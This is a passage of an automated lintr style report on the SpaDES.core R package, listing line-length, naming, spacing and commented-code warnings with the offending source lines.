{\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:365:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L365) *style:* **Commented code should be removed.**\n```r\n​            #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:380:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L380) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:384:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L384) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:385:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L385) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:386:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L386) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:425:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L425) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:448:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L448) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:540:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L540) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:567:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L567) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:575:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/cache.R#L575) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/9835dc24345167370987c6895000957753189c43/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be 